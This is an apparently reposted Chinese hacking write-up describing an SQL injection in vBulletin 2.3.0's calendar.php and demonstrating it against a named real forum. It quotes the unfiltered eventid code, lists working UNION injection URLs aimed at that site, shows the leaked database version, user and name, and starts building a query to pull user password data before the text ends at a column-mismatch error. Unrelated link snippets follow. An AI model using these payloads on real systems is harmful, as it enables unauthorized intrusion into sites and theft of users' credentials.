入侵灰色轨迹论坛

2016-01-29 16:07 33 1 收藏

入侵灰色轨迹论坛,入侵灰色轨迹论坛

【 tulaoshi.com - 网络基础知识 】

  灰色轨迹:一个人气很不错的黑客技术站点,也是当年培育我成长得地方。一日,闲来无事便想测试一下php脚本的安全性。所以就看了看灰色轨迹的VBB论坛。
  
  因为是由于灰色论坛启发的学习之路,所以偶得先看看灰色论坛用得是版本的vbb了―――vBulletin Forum 2.3.0。 恩,就是这个,立刻找到了原文件看起来。一来就打开看到了日历文件这里有这么一段:
  calendar。php,发现问题!
  -------- 相关代码如下 ----------
  else if ($action == "edit")
  {
  $eventinfo = $DB_site-query_first("SELECT
  allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid =
  $eventid");
  if ($eventinfo[userid] != $bbuserinfo[userid])
  {
  $permissions=getpermissions();
  if ($permissions[canpublicedit]!=1) {
  show_nopermission();
  }
  OK。我们可以看到eventid没有过滤。可以进行SQL INJECTION注射攻击。所以下面我们来构造句子进行注射。PHP+MYSQL的注射攻击条件比较难。由于MYSQL本身功能问题。限制了不少有用的注射方法。所以我们要完成注射就要找别的方法了。
  
  如果论坛使用的MySQL版本在4.00以上,就可以进行UNION攻击。至于如何察看MYSQL版本就不多说了。利用注射就可以做到得。
  攻击演示句子:
  http://bbs.isgrey.com/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,񟍰-0-0,user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
  此时query_first函数将只返回第一行的查询结果,如果存在漏洞。我们将看到MYSQL得版本和MYSQL得用户如果我们构造好。就可以得到数据库得任何内容。当然包括USER表中的密码
  二.论坛攻击与测试过程
  开始对灰色轨迹论坛进行测试:
  http://bbs.isgrey.com/calendar.php?s=&action=edit&eventid=10%20union%20(SELECT%20allowsmilies,public,userid,񟍰-0-0,user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate
  我们看到了结果:
  4.0.2-alpha-nt -----------------出现在标题栏--------就是我们的user()函数
  isgreyvbb@localhost ------------------------------事件内容里-----我们的version()函数
  再来
  http://bbs.isgrey.com/calendar.php?s=&action=edit&eventid=10%20union%20(SELECT%20allowsmilies,public,userid,񟍰-0-0,pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate
  结果:
  ------------------------------------------------
  看起来中新软件-灰色轨迹安全咨讯站技术讨论区数据库发生了一些微小的错误
  请按浏览器的 刷新 按钮重试。
  一封 E-Mail 已经发送给 技术支持信箱, 如果问题仍然存在,你也可以直接联系。
  
  对给你造成的不便我们深表歉意。
  ―――――――――――――――――――――――――――
  再来:
  http://bbs.isgrey.com/calendar.php?s=&action=edit&eventid=10%20union%20(SELECT%20allowsmilies,public,userid,񟍰-0-0,now(),database()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate
  
  vbb----------数据库名字
  
  http://bbs.isgrey.com/calendar.php?s=&action=edit&eventid=10%20union%20(SELECT%20allowsmilies,public,userid,񟍰-0-0,user(),md5(123456)%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate10adc3949ba59abbe56e057f20f883e
  哈哈........随便测试了几个函数.都成功了.但是我们怎么来取得密码呢?
  
  *******************************************************************************
  下面来构造取密码的句子:
  恩,我们用UNION.UNION来看看。两张表字段要相等,类型要相似,满足条件非常简单。
  SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1) 
  MySQL said:
  The used SELECT statements have a different number of columns
  恩,字段不相等,错误
  ********************************************************************************************

来源:http://www.tulaoshi.com/n/20160129/1497477.html

延伸阅读
肥胖,是所有女性也包括男性所不愿面临的问题,很多人都想把一身的赘肉摆脱掉,但是怎样去做,很多人都迷茫而返!今天,小编就给大家分享下减肥食谱,希望能够给大家在减肥的路上一点帮助。 减肥食谱一:乳香田园蔬菜 食物: 牛奶-240㏄,鲜奶油-少许,乳酪丝-少许,青花椰菜-100公克 做法: 1.将青花椰菜烫熟,用冷水...
标签: 分娩
早产儿论坛关于早产的问答。 病情描述及疑问: 朋友的妻子没到月就生孩子了,很是担心,想知道为什么会早产,什么原因导致的?该怎样护理?对孕妇有怎样的要求?为什么会早产?原因是什么?注意什么?、 建议:一般孕妇患有子宫畸形等先天发育不全症,容易使胎儿早产,因为子宫是胎儿生长的地方,如果子宫的肌肉不能很好地伸展,便容易出现...
魔兽争霸《疾风轨迹》CT 1.2上忍单通.附攻略 首先.选CT,输入-JF.不然打完KK有得你看的了. 一出来.CT500全买50的小蓝.+W.去打KK..走到他身边.挨他一个雷切.然后W.耗他一半血.(前期CT的W好牛逼- -.) 然后被他杀死.复活.在挨一个雷切.然后在W. KK死了.这是大概会2或者3级.(建议现加Q.) ...
1.不要用仪器祛斑! 奉劝大家不要去用仪器祛斑,那样只会解决暂时的问题,比如遗传性雀斑,以后一定会反弹,而且后遗症很大,往往会毁掉你的脸。我们实体店就接到很多顾客,用激光或者冷冻祛斑,导致脸发青发紫,这时候就是神仙也无法挽救了,我们遇到这样的顾客,也只是告诉她们,没法彻底祛除,只能淡化。 2.不要把化妆品当做祛斑药品! ...
标签: Web开发
在用JSP制作的电子商务网站多如牛毛。但是对于JSP网站而言,安全性真的能够让人放心吗?面对层出不穷的黑客攻击和病毒袭击,JSP网站的服务器能够比其他网站的服务器器更加安全吗?前段时间,应朋友之邀,我对他们托管的三台服务器的主机进行了测试,发现了JSP网站存在的几个问题。 入侵测试第一步:扫描 扫描是入侵的第一步,它...

经验教程

660

收藏

11
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部